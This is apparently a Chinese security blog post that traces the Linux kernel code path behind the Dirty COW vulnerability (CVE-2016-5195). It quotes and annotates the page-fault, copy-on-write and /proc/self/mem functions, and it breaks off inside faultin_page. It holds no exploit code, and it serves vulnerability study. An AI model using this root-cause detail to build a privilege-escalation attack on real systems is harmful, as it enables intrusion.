2023-11-11 22:19:04 AnQuanKeInfo 来源：ZONE.CI 全球网 0 阅读模式

前言

cve-2016-5195 就是非常有名的 dirty cow，早就听说过其优雅性，在之前也在靶场利用过，但那时只是在网上找了个利用脚本，并没有对相关漏洞原理进行分析。所以再次打算简要分析该漏洞产生的原理与简单利用。

注：本文重在记录漏洞触发链，不探索 dirty cow 的具体利用方式

默认读者了解或熟悉：COW机制、页表机制、mmap内存映射、page cache等知识。

这里提一嘴，mmap进行映射时，只是在匿名映射与文件映射区划分了一块 vma，但这时并没有分配物理内存，即对应的 pte 为空；在实际访问时，会触发 page fault，在缺页处理过程中会为其分配物理页面并更新 pte。

缺页异常处理大致流程

大致处理流程如下：

//__do_page_fault()
//    __handle_mm_fault()
//        handle_pte_fault()
//            do_wp_page() ==> pte在主存中，写缺页
//            do_fault() ==> pte不在主存中，及第一次非匿名页处理流程
//                do_read_fault()
//                do_cow_fault() ==> 写操作引起的缺页错误
//                do_shared_fault()

__do_page_fault

/*
 * This routine handles page faults.  It determines the address,
 * and the problem, and then passes it off to one of the appropriate
 * routines.
 *
 * This function must have noinline because both callers
 * {,trace_}do_page_fault() have notrace on. Having this an actual function
 * guarantees there's a function trace entry.
 */
static noinline void
__do_page_fault(struct pt_regs *regs, unsigned long error_code,
        unsigned long address)
{
    struct vm_area_struct *vma;
    struct task_struct *tsk;
    struct mm_struct *mm;
    int fault, major = 0;
    // 设置允许重试标志和可杀死进程标志
    unsigned int flags = FAULT_FLAG_ALLOW_RETRY | FAULT_FLAG_KILLABLE;

    tsk = current;
    mm = tsk->mm;

    /*
     * Detect and handle instructions that would cause a page fault for
     * both a tracked kernel page and a userspace page.
     */
    if (kmemcheck_active(regs))
        kmemcheck_hide(regs);
    prefetchw(&mm->mmap_sem); // 预取指令

    if (unlikely(kmmio_fault(regs, address)))
        return;

    /*
     * We fault-in kernel-space virtual memory on-demand. The
     * 'reference' page table is init_mm.pgd.
     *
     * NOTE! We MUST NOT take any locks for this case. We may
     * be in an interrupt or a critical region, and should
     * only copy the information from the master page table,
     * nothing more.
     *
     * This verifies that the fault happens in kernel space
     * (error_code & 4) == 0, and that the fault was not a
     * protection error (error_code & 9) == 0.
     */
    // address 处于内核空间
    if (unlikely(fault_in_kernel_space(address))) {
        if (!(error_code & (PF_RSVD | PF_USER | PF_PROT))) {
            // PF_RSVD: 页面保留，不能分配给进程
            // PF_USER: 页面是用户空间，不可被内核访问
            // PF_PROT: 页面只读
            if (vmalloc_fault(address) >= 0)
                return;

            if (kmemcheck_fault(regs, address, error_code))
                return;
        }

        /* Can handle a stale RO->RW TLB: */
        // 是否是虚假页面错误
        if (spurious_fault(error_code, address))
            return;

        /* kprobes don't want to hook the spurious faults: */
        if (kprobes_fault(regs))
            return;
        /*
         * Don't take the mm semaphore here. If we fixup a prefetch
         * fault we could otherwise deadlock:
         */
        bad_area_nosemaphore(regs, error_code, address, NULL);

        return;
    }

    // address 处于用户空间
    /* kprobes don't want to hook the spurious faults: */
    if (unlikely(kprobes_fault(regs)))
        return;

    if (unlikely(error_code & PF_RSVD)) // 页面保留
        pgtable_bad(regs, error_code, address);

    if (unlikely(smap_violation(error_code, regs))) { // smap 保护
        bad_area_nosemaphore(regs, error_code, address, NULL);
        return;
    }

    /*
     * If we're in an interrupt, have no user context or are running
     * in a region with pagefaults disabled then we must not take the fault
     */
    if (unlikely(faulthandler_disabled() || !mm)) {
        bad_area_nosemaphore(regs, error_code, address, NULL);
        return;
    }

    /*
     * It's safe to allow irq's after cr2 has been saved and the
     * vmalloc fault has been handled.
     *
     * User-mode registers count as a user access even for any
     * potential system fault or CPU buglet:
     */
    // 寄存器处于用户态
    if (user_mode(regs)) {
        local_irq_enable(); // 开启本地中断
        error_code |= PF_USER;  // 添加 PF_USER 标志
        flags |= FAULT_FLAG_USER;
    } else {
        if (regs->flags & X86_EFLAGS_IF)
            local_irq_enable();
    }

    perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, regs, address);

    if (error_code & PF_WRITE) // 写错误
        flags |= FAULT_FLAG_WRITE;
    if (error_code & PF_INSTR)
        flags |= FAULT_FLAG_INSTRUCTION;

    /*
     * When running in the kernel we expect faults to occur only to
     * addresses in user space.  All other faults represent errors in
     * the kernel and should generate an OOPS.  Unfortunately, in the
     * case of an erroneous fault occurring in a code path which already
     * holds mmap_sem we will deadlock attempting to validate the fault
     * against the address space.  Luckily the kernel only validly
     * references user space from well defined areas of code, which are
     * listed in the exceptions table.
     *
     * As the vast majority of faults will be valid we will only perform
     * the source reference check when there is a possibility of a
     * deadlock. Attempt to lock the address space, if we cannot we then
     * validate the source. If this is invalid we can skip the address
     * space check, thus avoiding the deadlock:
     */
    // 上锁
    if (unlikely(!down_read_trylock(&mm->mmap_sem))) { // 上锁失败
        if ((error_code & PF_USER) == 0 &&
            !search_exception_tables(regs->ip)) {
            bad_area_nosemaphore(regs, error_code, address, NULL);
            return;
        }
retry:
        down_read(&mm->mmap_sem);
    } else {
        /*
         * The above down_read_trylock() might have succeeded in
         * which case we'll have missed the might_sleep() from
         * down_read():
         */
        might_sleep();
    }

    vma = find_vma(mm, address); // 寻找 address 处于的 vma
    if (unlikely(!vma)) { // 没找到，直接 kill
        bad_area(regs, error_code, address);
        return;
    }
    if (likely(vma->vm_start <= address)) // address 位于该 vma
        goto good_area;
    if (unlikely(!(vma->vm_flags & VM_GROWSDOWN))) { // 堆栈，如果不存在 VM_GROWSDOWN 标志，直接 kill
        bad_area(regs, error_code, address);
        return;
    }
    if (error_code & PF_USER) {
        /*
         * Accessing the stack below %sp is always a bug.
         * The large cushion allows instructions like enter
         * and pusha to work. ("enter $65535, $31" pushes
         * 32 pointers and then decrements %sp by 65535.)
         */
        if (unlikely(address + 65536 + 32 * sizeof(unsigned long) < regs->sp)) {
            bad_area(regs, error_code, address);
            return;
        }
    }
    if (unlikely(expand_stack(vma, address))) { // 扩展堆栈
        bad_area(regs, error_code, address);
        return;
    }

    /*
     * Ok, we have a good vm_area for this memory access, so
     * we can handle it..
     */
good_area: // 运行到这里，说明是正常的缺页异常，address 属于进程的地址空间，此时进行请求调页，分配物理内存
    if (unlikely(access_error(error_code, vma))) {
        bad_area_access_error(regs, error_code, address, vma);
        return;
    }

    /*
     * If for any reason at all we couldn't handle the fault,
     * make sure we exit gracefully rather than endlessly redo
     * the fault.  Since we never set FAULT_FLAG_RETRY_NOWAIT, if
     * we get VM_FAULT_RETRY back, the mmap_sem has been unlocked.
     */
    // 分配物理页的核心函数
    fault = handle_mm_fault(mm, vma, address, flags);
    major |= fault & VM_FAULT_MAJOR;

    /*
     * If we need to retry the mmap_sem has already been released,
     * and if there is a fatal signal pending there is no guarantee
     * that we made any progress. Handle this case first.
     */
    if (unlikely(fault & VM_FAULT_RETRY)) { // 是否允许重试，但是最多一次
        /* Retry at most once */
        if (flags & FAULT_FLAG_ALLOW_RETRY) {
            flags &= ~FAULT_FLAG_ALLOW_RETRY; // 去除允许重试标志
            flags |= FAULT_FLAG_TRIED;
            if (!fatal_signal_pending(tsk))
                goto retry;
        }

        /* User mode? Just return to handle the fatal exception */
        if (flags & FAULT_FLAG_USER)
            return;

        /* Not returning to user mode? Handle exceptions or die: */
        no_context(regs, error_code, address, SIGBUS, BUS_ADRERR);
        return;
    }

    up_read(&mm->mmap_sem);
    if (unlikely(fault & VM_FAULT_ERROR)) {
        mm_fault_error(regs, error_code, address, vma, fault);
        return;
    }

    /*
     * Major/minor page fault accounting. If any of the events
     * returned VM_FAULT_MAJOR, we account it as a major fault.
     */
    if (major) {
        tsk->maj_flt++;
        perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MAJ, 1, regs, address);
    } else {
        tsk->min_flt++;
        perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MIN, 1, regs, address);
    }

    check_v8086_mode(regs, address, tsk);
}
NOKPROBE_SYMBOL(__do_page_fault);

大致流程：

判断 address 是位于内核地址空间还是用户地址空间
位于内核地址空间：
- 满足相关条件，进行 vmalloc_fault 处理
位于用户地址空间：
- 写错误，设置 FAULT_FLAG_WRITE 标志
- 满足条件，进行 handle_mm_fault 处理

handle_mm_fault ==> __handle_mm_fault

handle_mm_fault 主要调用了 __handle_mm_fault 函数：

/*
 * By the time we get here, we already hold the mm semaphore
 *
 * The mmap_sem may have been released depending on flags and our
 * return value.  See filemap_fault() and __lock_page_or_retry().
 */
static int __handle_mm_fault(struct mm_struct *mm, struct vm_area_struct *vma,
                 unsigned long address, unsigned int flags)
{
    // 四级页表结构
    pgd_t *pgd;
    pud_t *pud;
    pmd_t *pmd;
    pte_t *pte;

    if (!arch_vma_access_permitted(vma, flags & FAULT_FLAG_WRITE,
                        flags & FAULT_FLAG_INSTRUCTION,
                        flags & FAULT_FLAG_REMOTE))
        return VM_FAULT_SIGSEGV;

    if (unlikely(is_vm_hugetlb_page(vma)))
        return hugetlb_fault(mm, vma, address, flags);

    pgd = pgd_offset(mm, address); // 获取全局页表项地址
    pud = pud_alloc(mm, pgd, address); // 分配上级页表项
    if (!pud)
        return VM_FAULT_OOM;
    pmd = pmd_alloc(mm, pud, address); // 分配中间目录项
    if (!pmd)
        return VM_FAULT_OOM;
    if (pmd_none(*pmd) && transparent_hugepage_enabled(vma)) {
        int ret = create_huge_pmd(mm, vma, address, pmd, flags);
        if (!(ret & VM_FAULT_FALLBACK))
            return ret;
    } else {
        pmd_t orig_pmd = *pmd;
        int ret;

        barrier();
        if (pmd_trans_huge(orig_pmd) || pmd_devmap(orig_pmd)) {
            unsigned int dirty = flags & FAULT_FLAG_WRITE;

            if (pmd_protnone(orig_pmd))
                return do_huge_pmd_numa_page(mm, vma, address,
                                 orig_pmd, pmd);

            if (dirty && !pmd_write(orig_pmd)) {
                ret = wp_huge_pmd(mm, vma, address, pmd,
                            orig_pmd, flags);
                if (!(ret & VM_FAULT_FALLBACK))
                    return ret;
            } else {
                huge_pmd_set_accessed(mm, vma, address, pmd,
                              orig_pmd, dirty);
                return 0;
            }
        }
    }

    /*
     * Use pte_alloc() instead of pte_alloc_map, because we can't
     * run pte_offset_map on the pmd, if an huge pmd could
     * materialize from under us from a different thread.
     */
    if (unlikely(pte_alloc(mm, pmd, address)))
        return VM_FAULT_OOM;
    /*
     * If a huge pmd materialized under us just retry later.  Use
     * pmd_trans_unstable() instead of pmd_trans_huge() to ensure the pmd
     * didn't become pmd_trans_huge under us and then back to pmd_none, as
     * a result of MADV_DONTNEED running immediately after a huge pmd fault
     * in a different thread of this mm, in turn leading to a misleading
     * pmd_trans_huge() retval.  All we have to ensure is that it is a
     * regular pmd that we can walk with pte_offset_map() and we can do that
     * through an atomic read in C, which is what pmd_trans_unstable()
     * provides.
     */
    if (unlikely(pmd_trans_unstable(pmd) || pmd_devmap(*pmd)))
        return 0;
    /*
     * A regular pmd is established and it can't morph into a huge pmd
     * from under us anymore at this point because we hold the mmap_sem
     * read mode and khugepaged takes it in write mode. So now it's
     * safe to run pte_offset_map().
     */
    pte = pte_offset_map(pmd, address); // 获取页表项

    return handle_pte_fault(mm, vma, address, pte, pmd, flags); //核心处理函数
}

大致流程：

分配各级页表项，并获取页表项
正常的话，最后进行 handle_pte_fault 缺页处理

handle_pte_fault

/*
 * These routines also need to handle stuff like marking pages dirty
 * and/or accessed for architectures that don't do it in hardware (most
 * RISC architectures).  The early dirtying is also good on the i386.
 *
 * There is also a hook called "update_mmu_cache()" that architectures
 * with external mmu caches can use to update those (ie the Sparc or
 * PowerPC hashed page tables that act as extended TLBs).
 *
 * We enter with non-exclusive mmap_sem (to exclude vma changes,
 * but allow concurrent faults), and pte mapped but not yet locked.
 * We return with pte unmapped and unlocked.
 *
 * The mmap_sem may have been released depending on flags and our
 * return value.  See filemap_fault() and __lock_page_or_retry().
 */
static int handle_pte_fault(struct mm_struct *mm,
             struct vm_area_struct *vma, unsigned long address,
             pte_t *pte, pmd_t *pmd, unsigned int flags)
{
    pte_t entry;
    spinlock_t *ptl;

    /*
     * some architectures can have larger ptes than wordsize,
     * e.g.ppc44x-defconfig has CONFIG_PTE_64BIT=y and CONFIG_32BIT=y,
     * so READ_ONCE or ACCESS_ONCE cannot guarantee atomic accesses.
     * The code below just needs a consistent view for the ifs and
     * we later double check anyway with the ptl lock held. So here
     * a barrier will do.
     */
    entry = *pte; // 获取页表项内容
    barrier();
    // 该页不在主存中
    if (!pte_present(entry)) {
        if (pte_none(entry)) { // pte为空，表示第一次访问该页
            if (vma_is_anonymous(vma)) // 匿名页处理
                return do_anonymous_page(mm, vma, address,
                             pte, pmd, flags);
            else
                return do_fault(mm, vma, address, pte, pmd,
                        flags, entry); // 非匿名页处理
        }
        // pte 不为空，说明之前访问过该页，从交换区加载该页
        return do_swap_page(mm, vma, address,
                    pte, pmd, flags, entry);
    }

    // 该页在主存中
    if (pte_protnone(entry))
        return do_numa_page(mm, vma, address, entry, pte, pmd);

    ptl = pte_lockptr(mm, pmd);
    spin_lock(ptl); // 上自旋锁
    if (unlikely(!pte_same(*pte, entry))) // 并发检查
        goto unlock;
    if (flags & FAULT_FLAG_WRITE) { // 写错误，FAULT_FLAG_WRITE
        if (!pte_write(entry)) // 页不可写
            return do_wp_page(mm, vma, address,
                    pte, pmd, ptl, entry); // 进行COW，将内容写入由 do_fault()->do_cow_fault()分配的内存页中
        entry = pte_mkdirty(entry); // 脏页
    }
    entry = pte_mkyoung(entry); // 清除 dirty 标志
    if (ptep_set_access_flags(vma, address, pte, entry, flags & FAULT_FLAG_WRITE)) {
        update_mmu_cache(vma, address, pte); //pte 内容发生变化，将新内容写入 pte 页表项中
    } else {
        /*
         * This is needed only for protection faults but the arch code
         * is not yet telling us if this is a protection fault or not.
         * This still avoids useless tlb flushes for .text page faults
         * with threads.
         */
        if (flags & FAULT_FLAG_WRITE)
            flush_tlb_fix_spurious_fault(vma, address);
    }
unlock:
    pte_unmap_unlock(pte, ptl);
    return 0;
}

大致流程：

获取页表项中的内存页
- 该页不在主存中
  - pte 页表项为空
    - 匿名页，则进行 do_anonymous_page 处理
    - 非匿名页，则进行 do_fault 处理
  - pet 页表项不为空
    - 从交换区将页面换回主存
- 该页在主存中
  - 缺页写错误
    - 对应页不可写，调用 do_wp_page 进行 COW
    - 对应页可写，标脏
  - 非缺页写错误
    - 更新 pte 页表项

do_fault == 非匿名页处理

/*
 * We enter with non-exclusive mmap_sem (to exclude vma changes,
 * but allow concurrent faults).
 * The mmap_sem may have been released depending on flags and our
 * return value.  See filemap_fault() and __lock_page_or_retry().
 */
static int do_fault(struct mm_struct *mm, struct vm_area_struct *vma,
        unsigned long address, pte_t *page_table, pmd_t *pmd,
        unsigned int flags, pte_t orig_pte)
{
    pgoff_t pgoff = linear_page_index(vma, address);

    pte_unmap(page_table);
    /* The VMA was not fully populated on mmap() or missing VM_DONTEXPAND */
    if (!vma->vm_ops->fault)
        return VM_FAULT_SIGBUS;
    if (!(flags & FAULT_FLAG_WRITE)) // 非写缺页
        return do_read_fault(mm, vma, address, pmd, pgoff, flags,
                orig_pte);
    if (!(vma->vm_flags & VM_SHARED)) // 非共享映射
        return do_cow_fault(mm, vma, address, pmd, pgoff, flags,
                orig_pte);
    return do_shared_fault(mm, vma, address, pmd, pgoff, flags, orig_pte); // 共享映射
}

大致流程：

由读操作引起的缺页，则进行 do_read_fault 处理
由写私有映射引起的缺页，则进行 do_cow_fault 处理
其他操作引起的缺页，则进行 do_shared_fault 处理

do_cow_fault

static int do_cow_fault(struct mm_struct *mm, struct vm_area_struct *vma,
        unsigned long address, pmd_t *pmd,
        pgoff_t pgoff, unsigned int flags, pte_t orig_pte)
{
    struct page *fault_page, *new_page;
    struct mem_cgroup *memcg;
    spinlock_t *ptl;
    pte_t *pte;
    int ret;

    if (unlikely(anon_vma_prepare(vma)))
        return VM_FAULT_OOM;

    new_page = alloc_page_vma(GFP_HIGHUSER_MOVABLE, vma, address); // 分配一个新的物理页
    if (!new_page)
        return VM_FAULT_OOM;

    if (mem_cgroup_try_charge(new_page, mm, GFP_KERNEL, &memcg, false)) {
        put_page(new_page);
        return VM_FAULT_OOM;
    }

    ret = __do_fault(vma, address, pgoff, flags, new_page, &fault_page);  // 将文件内容读取到 fault_page 中
    if (unlikely(ret & (VM_FAULT_ERROR | VM_FAULT_NOPAGE | VM_FAULT_RETRY)))
        goto uncharge_out;

    if (fault_page)
        copy_user_highpage(new_page, fault_page, address, vma); // 将fault_page的内容复制到new_page中
    __SetPageUptodate(new_page);

    pte = pte_offset_map_lock(mm, pmd, address, &ptl); // 原子的获取 pte ???
    if (unlikely(!pte_same(*pte, orig_pte))) { // 并发检查
        pte_unmap_unlock(pte, ptl);
        if (fault_page) {
            unlock_page(fault_page);
            put_page(fault_page);
        } else {
            /*
             * The fault handler has no page to lock, so it holds
             * i_mmap_lock for read to protect against truncate.
             */
            i_mmap_unlock_read(vma->vm_file->f_mapping);
        }
        goto uncharge_out;
    }
    //设置pte，置换该进程中的pte表项，对于写操作会将该页标脏
    //函数将页面表项 (PTE) 设置为指向给定页面的新页面。该函数首先检查 PTE 是否存在。如果不存在，则函数会创建一个新的 PTE。
    //然后，函数将 PTE 设置为指向新页面。最后，函数将 PTE 标记为已修改。
    do_set_pte(vma, address, new_page, pte, true, true);
    mem_cgroup_commit_charge(new_page, memcg, false, false);
    lru_cache_add_active_or_unevictable(new_page, vma);
    pte_unmap_unlock(pte, ptl);
    if (fault_page) {
        unlock_page(fault_page);
        put_page(fault_page); // 释放 fault_page
    } else {
        /*
         * The fault handler has no page to lock, so it holds
         * i_mmap_lock for read to protect against truncate.
         */
        i_mmap_unlock_read(vma->vm_file->f_mapping);
    }
    return ret;
uncharge_out:
    mem_cgroup_cancel_charge(new_page, memcg, false);
    put_page(new_page);
    return ret;
}

大致流程：

分配一个新的页
更新页表项

注：此时还没有开始写内容

do_wp_page

static int do_wp_page(struct mm_struct *mm, struct vm_area_struct *vma,
        unsigned long address, pte_t *page_table, pmd_t *pmd,
        spinlock_t *ptl, pte_t orig_pte)
    __releases(ptl)
{
    struct page *old_page;

    old_page = vm_normal_page(vma, address, orig_pte);
    if (!old_page) {
        /*
         * VM_MIXEDMAP !pfn_valid() case, or VM_SOFTDIRTY clear on a
         * VM_PFNMAP VMA.
         *
         * We should not cow pages in a shared writeable mapping.
         * Just mark the pages writable and/or call ops->pfn_mkwrite.
         */
        if ((vma->vm_flags & (VM_WRITE|VM_SHARED)) ==
                     (VM_WRITE|VM_SHARED))
            return wp_pfn_shared(mm, vma, address, page_table, ptl,
                         orig_pte, pmd);

        pte_unmap_unlock(page_table, ptl);
        return wp_page_copy(mm, vma, address, page_table, pmd,
                    orig_pte, old_page);
    }

    /*
     * Take out anonymous pages first, anonymous shared vmas are
     * not dirty accountable.
     */
    // 处理匿名页
    if (PageAnon(old_page) && !PageKsm(old_page)) {
        int total_mapcount;
        if (!trylock_page(old_page)) { // 并发
            get_page(old_page);
            pte_unmap_unlock(page_table, ptl);
            lock_page(old_page);
            page_table = pte_offset_map_lock(mm, pmd, address,
                             &ptl);
            if (!pte_same(*page_table, orig_pte)) {
                unlock_page(old_page);
                pte_unmap_unlock(page_table, ptl);
                put_page(old_page);
                return 0;
            }
            put_page(old_page);
        }
        // 真正开始处理流程
       // 其中首先通过reuse_swap_page判断是否只有一个进程在使用该页，如果是则直接调用wp_page_reuse函数重用该页
        if (reuse_swap_page(old_page, &total_mapcount)) {
            if (total_mapcount == 1) {
                /*
                 * The page is all ours. Move it to
                 * our anon_vma so the rmap code will
                 * not search our parent or siblings.
                 * Protected against the rmap code by
                 * the page lock.
                 */
                page_move_anon_rmap(compound_head(old_page),
                            vma, address);
            }
            unlock_page(old_page);
            //一般的cow流程会走到这里，重用由do_cow_fault()分配好的内存页，不会再开辟新页
            return wp_page_reuse(mm, vma, address, page_table, ptl,
                         orig_pte, old_page, 0, 0);
        }
        unlock_page(old_page);
    } else if (unlikely((vma->vm_flags & (VM_WRITE|VM_SHARED)) ==
                    (VM_WRITE|VM_SHARED))) {
        return wp_page_shared(mm, vma, address, page_table, pmd,
                      ptl, orig_pte, old_page);
    }

    /*
     * Ok, we need to copy. Oh, well..
     */
    get_page(old_page);

    pte_unmap_unlock(page_table, ptl);
    return wp_page_copy(mm, vma, address, page_table, pmd,
                orig_pte, old_page);
}

COW 与缺页

当我们使用 mmap 映射一个只读文件，随后开辟一个新进程，尝试通过 /proc/self/mem 文件直接往一个原有的共享页面写入内容时，会调用对应函数表中的 mem_write 函数：

static const struct file_operations proc_mem_operations = {
    .llseek        = mem_lseek,
    .read        = mem_read,
    .write        = mem_write,
    .open        = mem_open,
    .release    = mem_release,
};

其中 mem_write 其实就是对 mem_rw 的一个封装：

static ssize_t mem_write(struct file *file, const char __user *buf,
             size_t count, loff_t *ppos)
{
    return mem_rw(file, (char __user*)buf, count, ppos, 1);
}

mem_rw

static ssize_t mem_rw(struct file *file, char __user *buf,
            size_t count, loff_t *ppos, int write)
{
    struct mm_struct *mm = file->private_data;
    unsigned long addr = *ppos;
    ssize_t copied;
    char *page;

    if (!mm)
        return 0;

    page = (char *)__get_free_page(GFP_TEMPORARY);// 分配临时的空闲内存页
    if (!page)
        return -ENOMEM;

    copied = 0;
    if (!atomic_inc_not_zero(&mm->mm_users))
        goto free;

    while (count > 0) {
        int this_len = min_t(int, count, PAGE_SIZE);
        // 如果是写入操作，将用户内存空间数据拷贝到临时内存页上
        if (write && copy_from_user(page, buf, this_len)) {
            copied = -EFAULT;
            break;
        }
        // access_remote_vm() 进行内存访问操作
        this_len = access_remote_vm(mm, addr, page, this_len, write);
        if (!this_len) {
            if (!copied)
                copied = -EIO;
            break;
        }
        // 如果操作读操作，此时待读出数据已经被读到了临时页面上，将其拷回用户空间
        if (!write && copy_to_user(buf, page, this_len)) {
            copied = -EFAULT;
            break;
        }

        buf += this_len;
        addr += this_len;
        copied += this_len;
        count -= this_len;
    }
    *ppos = addr;

    mmput(mm);
free://释放临时内存页
    free_page((unsigned long) page);
    return copied;
}

大致流程如下：

调用 __get_free_page() 分配一个空闲的内存页作为临时储存用户数据的空间
调用 access_remote_vm() 函数进行内存访问操作，根据传入的 write 参数进行读/写内存页面操作

access_remote_vm 其实又是对 __access_remote_vm 的封装：

int access_remote_vm(struct mm_struct *mm, unsigned long addr,
        void *buf, int len, int write)
{
    return __access_remote_vm(NULL, mm, addr, buf, len, write);
}

__access_remote_vm

static int __access_remote_vm(struct task_struct *tsk, struct mm_struct *mm,
        unsigned long addr, void *buf, int len, int write)
{
    struct vm_area_struct *vma;
    void *old_buf = buf;

    down_read(&mm->mmap_sem);
    /* ignore errors, just check how much was successfully transferred */
    while (len) {
        int bytes, ret, offset;
        void *maddr;
        struct page *page = NULL;
        //获取操作（从...读取/向...写入）对应的目标内存页
        ret = get_user_pages_remote(tsk, mm, addr, 1,
                write, 1, &page, &vma);
        if (ret <= 0) { // 失败
#ifndef CONFIG_HAVE_IOREMAP_PROT
            break;
#else
            /*
             * Check if this is a VM_IO | VM_PFNMAP VMA, which
             * we can access using slightly different code.
             */
            vma = find_vma(mm, addr);
            if (!vma || vma->vm_start > addr)
                break;
            if (vma->vm_ops && vma->vm_ops->access)
                ret = vma->vm_ops->access(vma, addr, buf,
                              len, write);
            if (ret <= 0)
                break;
            bytes = ret;
#endif
        } else {
            bytes = len;
            offset = addr & (PAGE_SIZE-1);
            if (bytes > PAGE_SIZE-offset)
                bytes = PAGE_SIZE-offset;
    // 利用 kmap 为获取到的页面建立临时映射，因为我们获取的是 page 结构体，需要映射到一个虚拟地址之后才能进行写入
            maddr = kmap(page);
            if (write) {
                copy_to_user_page(vma, page, addr,
                          maddr + offset, buf, bytes); // 向对应内存页写入数据
                set_page_dirty_lock(page);
            } else {
                copy_from_user_page(vma, page, addr,
                            buf, maddr + offset, bytes); // 从对应内存页读取数据
            }
            kunmap(page);
            put_page(page);
        }
        len -= bytes;
        buf += bytes;
        addr += bytes;
    }
    up_read(&mm->mmap_sem);

    return buf - old_buf;
}

大致流程：

通过 get_user_pages_remote() 获取到对应的内存页（注意这里获取的是 page 结构体，因为该物理页不一定有映射）
通过 kmap() 或许到该内存页映射到的虚拟地址（若无则会建立新的临时映射）
通过 copy_from_user_page()/copy_to_user_page() 读/写对应的内存页

我分析的代码跟网上的好像有些许不同，不知道是内核版本不同，还是我分析的是 patch 的代码，不管了

get_user_pages_remote 是 __get_user_pages_locked 的封装：

long get_user_pages_remote(struct task_struct *tsk, struct mm_struct *mm,
        unsigned long start, unsigned long nr_pages,
        int write, int force, struct page **pages,
        struct vm_area_struct **vmas)
{
    return __get_user_pages_locked(tsk, mm, start, nr_pages, write, force,
                       pages, vmas, NULL, false,
                       FOLL_TOUCH | FOLL_REMOTE);
}
EXPORT_SYMBOL(get_user_pages_remote);

而 __get_user_pages_locked 最后会调用到 __get_user_pages：

static __always_inline long __get_user_pages_locked(struct task_struct *tsk,
                        struct mm_struct *mm,
                        unsigned long start,
                        unsigned long nr_pages,
                        int write, int force,
                        struct page **pages,
                        struct vm_area_struct **vmas,
                        int *locked, bool notify_drop,
                        unsigned int flags)
{
    long ret, pages_done;
    bool lock_dropped;

    if (locked) {
        /* if VM_FAULT_RETRY can be returned, vmas become invalid */
        BUG_ON(vmas);
        /* check caller initialized locked */
        BUG_ON(*locked != 1);
    }

    if (pages)
        flags |= FOLL_GET;
    if (write)
        flags |= FOLL_WRITE;
    if (force)
        flags |= FOLL_FORCE;

    pages_done = 0;
    lock_dropped = false;
    for (;;) {
        ret = __get_user_pages(tsk, mm, start, nr_pages, flags, pages,
                       vmas, locked);
    ......

注：写入时，会设置 FOLL_WRITE 标志

__get_user_pages

long __get_user_pages(struct task_struct *tsk, struct mm_struct *mm,
        unsigned long start, unsigned long nr_pages,
        unsigned int gup_flags, struct page **pages,
        struct vm_area_struct **vmas, int *nonblocking)
{
    long i = 0;
    unsigned int page_mask;
    struct vm_area_struct *vma = NULL;

    if (!nr_pages)
        return 0;

    VM_BUG_ON(!!pages != !!(gup_flags & FOLL_GET));

    /*
     * If FOLL_FORCE is set then do not force a full fault as the hinting
     * fault information is unrelated to the reference behaviour of a task
     * using the address space
     */
    if (!(gup_flags & FOLL_FORCE))
        gup_flags |= FOLL_NUMA;

    do {
        struct page *page;
        unsigned int foll_flags = gup_flags;
        unsigned int page_increm;

        /* first iteration or cross vma bound */
        if (!vma || start >= vma->vm_end) {
            vma = find_extend_vma(mm, start);
            if (!vma && in_gate_area(mm, start)) {
                int ret;
                ret = get_gate_page(mm, start & PAGE_MASK,
                        gup_flags, &vma,
                        pages ? &pages[i] : NULL);
                if (ret)
                    return i ? : ret;
                page_mask = 0;
                goto next_page;
            }

            if (!vma || check_vma_flags(vma, gup_flags))
                return i ? : -EFAULT;
            if (is_vm_hugetlb_page(vma)) {
                i = follow_hugetlb_page(mm, vma, pages, vmas,
                        &start, &nr_pages, i,
                        gup_flags);
                continue;
            }
        }
retry:
        /*
         * If we have a pending SIGKILL, don't keep faulting pages and
         * potentially allocating memory.
         */
        if (unlikely(fatal_signal_pending(current)))
            return i ? i : -ERESTARTSYS;
        cond_resched();
        page = follow_page_mask(vma, start, foll_flags, &page_mask); // 获取虚拟地址对应的物理页（page结构体）
        if (!page) {// 失败了
                    /*
                    /* 两种原因：
                    * (1) 不存在对应的物理页（未与物理页见建立相应的映射关系）
                    * (2) 存在这样的物理页，但是没有相应的操作权限（如该页不可写）
                    * 在 COW 流程中会先走(1)，然后走(2)
                    */
            int ret;
            ret = faultin_page(tsk, vma, start, &foll_flags,
                    nonblocking);//【核心】处理缺页异常
            switch (ret) {
            case 0:
                goto retry;//成功处理缺页异常，回去重新尝试调页
            case -EFAULT:
            case -ENOMEM:
            case -EHWPOISON:
                return i ? i : ret;
            case -EBUSY:
                return i;
            case -ENOENT:
                goto next_page;
            }
            BUG();
        } else if (PTR_ERR(page) == -EEXIST) {
            /*
             * Proper page table entry exists, but no corresponding
             * struct page.
             */
            goto next_page;
        } else if (IS_ERR(page)) {
            return i ? i : PTR_ERR(page);
        }
        if (pages) {
            pages[i] = page;
            flush_anon_page(vma, page, start);
            flush_dcache_page(page);
            page_mask = 0;
        }
next_page:
        if (vmas) {
            vmas[i] = vma;
            page_mask = 0;
        }
        page_increm = 1 + (~(start >> PAGE_SHIFT) & page_mask);
        if (page_increm > nr_pages)
            page_increm = nr_pages;
        i += page_increm;
        start += page_increm * PAGE_SIZE;
        nr_pages -= page_increm;
    } while (nr_pages);
    return i;
}
EXPORT_SYMBOL(__get_user_pages);

COW 的两个要点：

在最开始说过，mmap进行映射时并没有建立起该页与对应物理页间的映射，只是单纯分配了虚拟地址而言；所以此时 follow_page_mask 返回 NULL；由于没获取到对应内存页，接下来调用 faultin_page() 函数解决缺页异常，分配物理页
调用 faultin_page 函数成功解决缺页异常之后会回到 retry 标签，接下来会重新调用 follow_page_mask ，而若是当前进程对于该页没有写权限，则还是会返回NULL；由于没获取到对应内存页，接下来调用 faultin_page 函数解决缺页异常，进行写时复制

faultin_page

static int faultin_page(struct task_struct *tsk, struct vm_area_struct *vma,
        unsigned long address, unsigned int *flags, int *nonblocking)
{
    struct mm_struct *mm = vma->vm_mm;
    unsigned int fault_flags = 0;
    int ret;

    /* mlock all present pages, but do not fault in new pages */
    if ((*flags & (FOLL_POPULATE | FOLL_MLOCK)) == FOLL_MLOCK)
        return -ENOENT;
    /* For mm_populate(), just skip the stack guard page. */
    if ((*flags & FOLL_POPULATE) &&
            (stack_guard_page_start(vma, address) ||
             stack_guard_page_end(vma, address + PAGE_SIZE)))
        return -ENOENT;
    if (*flags & FOLL_WRITE) //因为我们要写入该页，所以该标志位存在
        fault_flags |= FAULT_FLAG_WRITE;
    if (*flags & FOLL_REMOTE)
